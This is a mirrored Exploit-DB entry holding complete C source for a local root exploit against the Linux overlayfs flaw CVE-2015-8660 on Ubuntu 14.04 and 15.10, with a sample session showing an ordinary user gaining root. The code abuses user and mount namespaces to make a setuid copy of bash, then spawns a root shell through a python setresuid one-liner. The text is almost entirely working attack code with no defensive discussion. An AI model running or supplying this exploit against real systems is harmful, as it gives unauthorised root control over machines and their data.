Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation (1) - 体验盒子

作者： rebel

日期： 2016-01-05

类别：

local

平台：

linux

来源：https://www.exploit-db.com/exploits/39166/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

/*

just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root

# Date: 2016-01-05

# Exploit Author: rebel

# Version: Ubuntu 14.04 LTS, 15.10 and more

# Tested on: Ubuntu 14.04 LTS, 15.10

# CVE : CVE-2015-8660

blah@ubuntu:~$ id

uid=1001(blah) gid=1001(blah) groups=1001(blah)

blah@ubuntu:~$ uname -a && cat /etc/issue

Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 14.04.3 LTS \n \l

blah@ubuntu:~$ ./overlayfail

root@ubuntu:~# id

uid=0(root) gid=1001(blah) groups=0(root),1001(blah)

12/2015

by rebel

6354b4e23db225b565d79f226f2e49ec0fe1e19b

*/

#include <stdio.h>

#include <sched.h>

#include <stdlib.h>

#include <unistd.h>

#include <sched.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/mount.h>

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <sched.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <sys/mount.h>

#include <sys/types.h>

#include <signal.h>

#include <fcntl.h>

#include <string.h>

#include <linux/sched.h>

#include <sys/wait.h>

static char child_stack[1024*1024];

static int

child_exec(void *stuff)

{

system("rm -rf /tmp/haxhax");

mkdir("/tmp/haxhax", 0777);

mkdir("/tmp/haxhax/w", 0777);

mkdir("/tmp/haxhax/u",0777);

mkdir("/tmp/haxhax/o",0777);

if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {

fprintf(stderr,"mount failed..\n");

}

chmod("/tmp/haxhax/w/work",0777);

chdir("/tmp/haxhax/o");

chmod("bash",04755);

chdir("/");

umount("/tmp/haxhax/o");

return 0;

}

int

main(int argc, char **argv)

{

int status;

pid_t wrapper, init;

int clone_flags = CLONE_NEWNS | SIGCHLD;

struct stat s;

if((wrapper = fork()) == 0) {

if(unshare(CLONE_NEWUSER) != 0)

fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {

pid_t pid =

clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);

if(pid < 0) {

fprintf(stderr, "failed to create new mount namespace\n");

exit(-1);

}

waitpid(pid, &status, 0);

}

waitpid(init, &status, 0);

return 0;

}

usleep(300000);

wait(NULL);

stat("/tmp/haxhax/u/bash",&s);

if(s.st_mode == 0x89ed)

execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);

fprintf(stderr,"couldn't create suid :(\n");

return -1;

}